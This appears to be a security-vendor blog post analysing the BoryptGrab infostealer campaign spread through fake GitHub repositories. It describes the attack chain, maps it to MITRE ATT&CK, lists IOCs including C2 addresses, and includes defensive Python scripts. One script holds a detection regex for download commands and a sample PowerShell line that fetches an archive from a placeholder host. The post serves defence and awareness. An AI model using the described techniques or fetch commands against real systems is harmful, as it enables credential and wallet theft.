
GitHub exploited: Hundreds of fake projects are silently stealing user data


Overview

GitHub has always been considered an indispensable part of the global software development ecosystem. Millions of developers use this platform to share projects, collaborate on development, and distribute open-source tools. However, its popularity and high level of trust also make GitHub an attractive target for cyberattack groups.

In March 2026, experts at Trend Micro discovered a new malware campaign called BoryptGrab, spreading through hundreds of public GitHub repositories masquerading as free software tools and game cheats. The campaign uses SEO keywords to boost search rankings, leading victims to fake GitHub Pages download sites to download ZIP files containing malware.

According to investigation reports, over 100 malicious repositories were used in this campaign, indicating a significant level of organization and scale. The BoryptGrab malware primarily focuses on stealing critical data such as browser login information, session cookies, system data, and even cryptocurrency wallet details. In some cases, the malware also deploys remote access mechanisms to maintain long-term control over the victim's device.

The cause of the campaign

  • Users believe repositories on GitHub are trustworthy.

  • Attackers optimize README files so repositories appear on Google.

  • GitHub allows quick and public repository creation.

  • Users download and run executable files from unverified sources.

Initial impact

  • Login credentials and passwords stored in the browser.

  • Session cookies for online services.

  • Cryptocurrency wallet data.

  • System information and device configuration.

The theft of this data can lead to account takeovers, financial fraud, or unauthorized access to online systems.

Attack vector

Typically, users search on Google for keywords like free software download, game cheat / FPS booster, or cracked software. Recognizing this, attackers created over 100 GitHub repositories with READMEs filled with SEO keywords to rank high in search results. Some tools that have been commonly spoofed by attackers include Voicemod Pro, Filmora crack, Valorant FPS booster, and CS2 skin changer.

After the victim accesses the repository, they will see a section of the README with detailed descriptions and download instructions, along with a "Download latest release" link. However, these repositories typically do not contain actual source code, only download links.

After clicking download, the victim doesn't download the file directly but is instead redirected through multiple steps, each serving as a perfect stepping stone in a sophisticated attack chain.

The redirect URLs in this chain are Base64-encoded and carry AES-encrypted link data, so the true source of the malware is hidden from anyone inspecting the page or the traffic.

The final redirect leads to a webpage containing a malicious Zip file, named similarly to the real tool to minimize suspicion. The typical structure of these Zip files includes malicious sub-files: tool.exe, libcurl.dll, launcher payload, or stealer payload.

Having downloaded the malicious Zip file without suspecting anything, the user extracts it and runs the executable on their personal computer. At this point DLL sideloading takes over: the executable loads the malicious "libcurl.dll" placed beside it in the archive, and that DLL drives the rest of the chain.

This DLL will decrypt the payload using XOR + AES-CBC.
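The layout described above (an executable shipped next to a DLL with a well-known name, plus a script dropper) can be spotted before anything is run. The following triage script is an added example written for this article, not code from the original post or from Trend Micro. It inspects a ZIP in memory without extracting it, groups members by directory, and flags DLLs whose names are commonly abused for sideloading when an EXE sits in the same directory. The list of DLL names is an assumption of the example (libcurl.dll is the one the article names); the sample archive is constructed with placeholder bytes.

```python
import io
import zipfile
from pathlib import PurePosixPath

# DLL names frequently abused for sideloading because many programs load them
# by name from their own directory. Illustrative list chosen for this example
# (not from the write-up); libcurl.dll is included because the article names it.
COMMONLY_SIDELOADED_DLLS = {
    "libcurl.dll", "version.dll", "dbghelp.dll", "cryptbase.dll",
    "wtsapi32.dll", "userenv.dll",
}
SCRIPT_SUFFIXES = (".vbs", ".ps1", ".bat", ".cmd", ".scr", ".js")


def triage_archive(zip_bytes):
    """Inspect a ZIP without extracting it and report the pieces that make up
    a sideloading bundle: executables, DLLs sitting beside them, and scripts."""
    findings = {"executables": [], "sideload_candidates": [], "scripts": []}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        members = [m for m in zf.infolist() if not m.is_dir()]
    by_dir = {}
    for m in members:
        p = PurePosixPath(m.filename)
        by_dir.setdefault(str(p.parent), []).append(p.name.lower())
    for d, files in by_dir.items():
        exes = [f for f in files if f.endswith(".exe")]
        dlls = [f for f in files if f.endswith(".dll")]
        findings["executables"] += [f"{d}/{f}" for f in exes]
        findings["scripts"] += [f"{d}/{f}" for f in files if f.endswith(SCRIPT_SUFFIXES)]
        # A DLL is only a sideload candidate when an EXE in the same directory
        # could load it by name in preference to the system copy.
        if exes:
            findings["sideload_candidates"] += [
                f"{d}/{f}" for f in dlls if f in COMMONLY_SIDELOADED_DLLS
            ]
    return findings


def verdict(findings):
    """Coarse risk label for the triage output."""
    if findings["sideload_candidates"] and findings["scripts"]:
        return "high"
    if findings["sideload_candidates"] or findings["scripts"]:
        return "medium"
    return "low"


def build_sample_archive():
    """Constructed stand-in for the archive layout the article describes
    (tool.exe next to libcurl.dll plus a VBS dropper). The member contents
    are placeholder bytes, not real binaries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("VoicemodPro/tool.exe", b"MZ placeholder")
        zf.writestr("VoicemodPro/libcurl.dll", b"MZ placeholder")
        zf.writestr("VoicemodPro/setup.vbs", b"' placeholder")
        zf.writestr("VoicemodPro/README.txt", b"placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    result = triage_archive(build_sample_archive())
    print(result, verdict(result))
```

Run it on a downloaded archive by passing the file's bytes to `triage_archive`; a "high" verdict does not prove the archive is malicious, but it is exactly the bundle shape that warrants running the files through antivirus and checking signatures before anything is executed.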

Alongside the malicious DLL, attackers also use another variant: a VBS script. It executes PowerShell commands to download the payload onto the victim's machine and, in addition, adds Windows Defender exclusions to avoid detection.

During the behavior analysis, experts noted a crucial step: the stealer's environment checks. Before running, it performs several specific actions: checking registry keys that reveal virtual machines, looking for sandbox artefacts, and inspecting the system path. All of these aim to determine whether the malware is running in a virtualized environment. If it detects virtualization, it immediately stops and terminates its lifecycle.

After successfully running, BoryptGrab will begin stealing information, starting with data from browsers like Chrome, Firefox, Edge, Brave, and Opera. Here, the attacker targets passwords, cookies, and autofill data—considered valuable assets on the browser. Additionally, the malware bypasses Chrome App-Bound Encryption to access protected credentials.

Besides browser data, BoryptGrab can collect information from cryptocurrency wallet applications like Exodus, Electrum, Ledger, or Trezor on desktop computers and browser extensions. BoryptGrab then takes screenshots and gathers system information.

Additionally, during the analysis, experts also discovered several new variants of BoryptGrab being used, notably the "TunnesshClient backdoor."

This backdoor will create a reverse SSH tunnel and function as a SOCKS5 proxy, allowing the attacker to remotely access the target system.

All the collected data is sent to the attacker's C2 server at 193.143.1.104 on port 5000 using HTTP POST requests.
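The exfiltration pattern described here (HTTP POST to a bare IP address on a non-standard port) is easy to pick out of proxy or firewall logs. The detection below is an added example for this article, not code from the original post or from Trend Micro. It uses the two C2 addresses from the article's text and IOC list as a known-bad set, and additionally flags any POST to an IP literal and any request to a port other than 80/443. The log format and the log lines are constructed for the example; adapt `LINE_RE` to your proxy's actual format.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Addresses the article associates with BoryptGrab command and control.
KNOWN_C2 = {"193.143.1.104", "45.93.20.61"}
STANDARD_PORTS = {80, 443}

# Constructed proxy log lines (not real traffic):
# timestamp  client  method  url  status  bytes_sent
SAMPLE_LOG = """\
2026-03-12T10:01:02Z 10.0.0.15 GET https://github.com/example/repo 200 512
2026-03-12T10:01:07Z 10.0.0.15 POST https://api.example.com/v1/upload 200 812
2026-03-12T10:02:31Z 10.0.0.15 POST http://193.143.1.104:5000/ 200 184320
2026-03-12T10:02:40Z 10.0.0.22 POST http://198.51.100.7:8080/submit 200 2048
2026-03-12T10:03:10Z 10.0.0.22 GET http://45.93.20.61/ 200 97
"""

# Assumed log layout for this example; real proxies use their own formats.
LINE_RE = re.compile(r"^(\S+) (\S+) (GET|POST|PUT|HEAD|CONNECT) (\S+) (\d{3}) (\d+)$")


def parse_line(line):
    """Split one log line into fields; returns None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status, nbytes = m.groups()
    u = urlparse(url)
    if u.hostname is None:
        return None
    port = u.port or (443 if u.scheme == "https" else 80)
    return {"ts": ts, "client": client, "method": method, "url": url,
            "host": u.hostname, "port": port, "status": int(status),
            "bytes": int(nbytes)}


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify(entry):
    """Reasons a request resembles the exfiltration the article describes."""
    reasons = []
    if entry["host"] in KNOWN_C2:
        reasons.append("known_c2")
    if entry["method"] == "POST" and is_ip_literal(entry["host"]):
        reasons.append("post_to_ip_literal")
    if entry["port"] not in STANDARD_PORTS:
        reasons.append("nonstandard_port")
    return reasons


def scan(log_text):
    """Return (line_no, host, port, reasons) for every suspicious request."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        e = parse_line(line)
        if e is None:
            continue
        reasons = classify(e)
        if reasons:
            hits.append((n, e["host"], e["port"], reasons))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The known-C2 match is the high-confidence signal; the other two rules are broader and will also catch legitimate software that talks to raw IPs, so treat them as triage hints and correlate with the client that made the request and the volume of data sent.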

Conclusion

The BoryptGrab campaign highlights the trend of threat actors increasingly exploiting reputable developer platforms like GitHub to distribute large-scale malware. With hundreds of repositories, numerous build variants, and diverse payloads (stealer + backdoor + Vidar), this is an actively ongoing campaign. Users need to be extremely cautious when downloading "free" software from GitHub, especially crack/cheat game tools.

Recommendations

Check the reliability of the repository before downloading.

  • Avoid downloading and running software immediately from unfamiliar repositories. Users should:

    • Check the number of stars, forks, and contributors of the project

    • Review the commit history to assess the repository's activity level

    • Examine the account of the repository creator (new accounts may be suspicious)

    • Read the Issues and Discussions sections to see community feedback

  • Malicious repositories often have a very short commit history or contain only a few simple files.

Do not run executable files downloaded from the Internet directly.

  • Much malware is distributed as:

    • .exe files

    • .bat files

    • .ps1 files

    • .scr files

    • .msi files

    Users should:

    • Scan the file with antivirus software

    • Check the file's digital signature

    • Avoid running the file immediately after extracting

Analyze the source code before use.

  • For open-source projects, you should:

    • Read the README file and source code

    • Check installation scripts (install.sh, setup.ps1, build scripts)

    • Pay attention to code segments that download files from external URLs
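The checks in the two recommendations above (repository reputation signals, and install scripts that pull files from external URLs) can be scripted. The block below is an added example written for this article, not code from the original post or from Trend Micro. `score_repo` turns the listed signals (stars, forks, contributors, commit history, owner account age, absence of real source files, off-GitHub download links in the README) into a risk score, and `scan_install_script` flags lines of an installer that fetch remote content. The metadata dicts, the thresholds, the list of fetch commands and the sample install script are all constructed assumptions; in practice the dict fields would be filled from the GitHub REST API.

```python
import re
from datetime import datetime, timezone
from urllib.parse import urlparse

GITHUB_HOSTS = ("github.com", "raw.githubusercontent.com", "objects.githubusercontent.com")
SOURCE_SUFFIXES = (".c", ".cpp", ".cs", ".go", ".java", ".js", ".py", ".rs", ".ts", ".h")
URL_RE = re.compile(r"https?://[^\s\"'<>()]+", re.IGNORECASE)
# Commands an install script uses to pull content from the network
# (illustrative list chosen for this example, not exhaustive).
FETCH_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Start-BitsTransfer"
    r"|\bcurl\b|\bwget\b|certutil\s+-urlcache", re.IGNORECASE)


def is_github_host(url):
    host = (urlparse(url).hostname or "").lower()
    return any(host == h or host.endswith("." + h) for h in GITHUB_HOSTS)


def score_repo(meta, now):
    """Score the signals the article recommends checking; higher is riskier.
    Thresholds are assumptions of this example."""
    score, reasons = 0, []

    def flag(points, why):
        nonlocal score
        score += points
        reasons.append(why)

    if meta["stars"] < 10:
        flag(1, "few stars")
    if meta["forks"] < 3:
        flag(1, "few forks")
    if meta["contributors"] <= 1:
        flag(2, "single contributor")
    if meta["commits"] <= 3:
        flag(2, "very short commit history")
    owner_age = (now - meta["owner_created_at"]).days
    if owner_age < 30:
        flag(2, f"owner account is {owner_age} days old")
    if not any(f.lower().endswith(SOURCE_SUFFIXES) for f in meta["files"]):
        flag(2, "no source files, only README/metadata")
    offsite = [u for u in URL_RE.findall(meta["readme"]) if not is_github_host(u)]
    if offsite and re.search(r"download", meta["readme"], re.IGNORECASE):
        flag(3, f"README pushes downloads to off-GitHub hosts: {offsite}")
    return score, reasons


def scan_install_script(text):
    """Flag installer lines that fetch remote content or reference non-GitHub URLs."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        external = [u for u in URL_RE.findall(line) if not is_github_host(u)]
        fetch = FETCH_RE.search(line) is not None
        if fetch or external:
            hits.append({"line": n, "fetch": fetch, "external_urls": external})
    return hits


NOW = datetime(2026, 3, 15, tzinfo=timezone.utc)

# Constructed metadata shaped like a subset of what the GitHub REST API
# returns for a repository and its owner; these are not real repositories.
SUSPICIOUS = {
    "stars": 2, "forks": 0, "contributors": 1, "commits": 2,
    "owner_created_at": datetime(2026, 3, 1, tzinfo=timezone.utc),
    "files": ["README.md", "logo.png"],
    "readme": "# Voicemod Pro free download\n[Download latest release]"
              "(https://example-download-site.invalid/github-download.html)",
}
HEALTHY = {
    "stars": 4200, "forks": 310, "contributors": 27, "commits": 1850,
    "owner_created_at": datetime(2015, 6, 1, tzinfo=timezone.utc),
    "files": ["README.md", "LICENSE", "src/main.rs", "Cargo.toml"],
    "readme": "# Widely used tool\nSee https://github.com/example/tool/releases",
}

# Constructed install script: the second line stages a payload from an external host.
SAMPLE_INSTALL_PS1 = """\
$dst = Join-Path $env:TEMP 'tool.zip'
Invoke-WebRequest -Uri 'https://example-download-site.invalid/tool.zip' -OutFile $dst
Expand-Archive $dst -DestinationPath $env:TEMP
"""

if __name__ == "__main__":
    print(score_repo(SUSPICIOUS, NOW))
    print(score_repo(HEALTHY, NOW))
    print(scan_install_script(SAMPLE_INSTALL_PS1))
```

The score is a prioritisation aid, not a verdict: a brand-new project by a legitimate developer will also trip the age and popularity rules, which is why the off-GitHub download link and the absence of any source code carry the most weight here, matching the article's observation that the malicious repositories contained only download links.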

Protect browser data and accounts

  • Infostealers like BoryptGrab often target credentials stored in the browser. Therefore, users should:

    • Use a dedicated password manager instead of saving passwords directly in the browser

    • Enable multi-factor authentication (MFA) for important accounts

    • Regularly check for unusual login activity

Update the system and security software.

  • Always ensure that:

    • The operating system is updated with the latest patches.

    • Antivirus/endpoint protection software is fully operational.

    • Real-time protection is enabled.

Mapping MITRE ATT&CK

| Phase                | Technique                              | ID        |
|----------------------|----------------------------------------|-----------|
| Initial Access       | Search engine poisoning / user download | T1189    |
| Resource Development | Create malicious infrastructure        | T1583     |
| Execution            | User execution                         | T1204     |
| Execution            | PowerShell                             | T1059.001 |
| Execution            | VBS script                             | T1059     |
| Defense Evasion      | DLL sideloading                        | T1574.002 |
| Defense Evasion      | Modify Defender exclusions             | T1562     |
| Discovery            | System information discovery           | T1082     |
| Credential Access    | Credential dumping (browser)           | T1555     |
| Collection           | Data from local system                 | T1005     |
| Command & Control    | Reverse SSH tunnel                     | T1090     |
| Exfiltration         | Exfiltration over C2                   | T1041     |

IOCs

File Hash

  • fa767391b99865f8533efc1fe6dfa6175215718679fb00ca85fc13c3bd4ae4b7

  • d295720bc0c1111ce1c3d8b1bc1b36ba840f103b3ca7e95a5a8bf03e2cc44fe5

  • 1bd605ef84b6767df74bd6290f1468eed5a88264df23fcf70b6a75d5bdcf7d76

  • 15de71073f44c657c23f5f97caa11f1b12e654d4d17684bfc628cc1e5b6bcdd5

  • 4e90d386c1c7d3d1fd4176975795a2f432d95685690778e09313b4a1dbab9997

  • 4264a88035aa0b63e9aef96daa78a58114d60a344ea10168a8ef5ef36bf8edbd

  • 433a13cc70396f80dc29d1150c050339d78964fdc91bcdc3f40c67a77add1476

  • 7f2315b89fb9a47e1516def136844d617bfcdce19000a1b0436706692dbe166c

  • 449f528f5ceae8c3f8336d0d8e3e3ec9031d1ad67c31ee7311b67e01d5fdf225

  • c40b9913e79c5dd09751b1afb03aaa98658bab61bacf27a299abd84fd44fe707

  • 2abe0ef88ba92db79d82cde4c0ed1f382bb347517a54ea82084c841d0f955518

  • 2050468744e44554fac17fb83f1515c95f2f2236716e2b5267a81c2b94205e6a

  • fe4e5fb28d2c2b3a640112b6b125ce8c4afa8be28342e3bfda097ad9dd2ef9ee

  • ed1745cc49b929e499966d87e163219fe0f24069fe88dfacbd69c0ebab85a640

  • 576692df4bf1c7d8927d3a183f5219a81c3bff3dd22971691f8af6889f80c5a0

  • 0434437a073a3f3a49e84d5ecb20c99dd551bacc32bf100fbb8cf67a50642181

URL

  • hxxps://github[.]com/Voicemod-Pro-Download-Tool

  • hxxps://voicemod-pro-download-tool.github[.]io/.github/

  • hxxps://github[.]com/Voicemod-Pro-Download-Tool/.github

  • hxxps://kiamatka[.]com/kaiok.kakman

  • hxxps://best-tinted[.]com/github-download.html

  • hxxps://github[.]com/PassFab-4WinKey-Windows-Password-Reset

  • hxxps://github[.]com/Yim-Mod-Menu/.github

  • hxxps://github[.]com/Arena-Breakout-Infinite-ESP/.github

  • hxxps://github[.]com/Graphic-Editor-Krita/.github

  • hxxps://botshield[.]vu/kFcjld

  • hxxps://botshield[.]vu/KKRkm9

C2

  • 45.93.20[.]61

References

  1. Massive GitHub malware operation spreads BoryptGrab stealer

  2. New BoryptGrab Stealer Targets Windows Users via Deceptive GitHub Pages | Trend Micro (US)

  3. BoryptGrab Malware Exploits GitHub | Security News

  4. BoryptGrab Stealer Spreads via Fake GitHub Repositories, Stealing Browser and Crypto Wallet Data | Cryptika Cybersecurity

FPT IS Security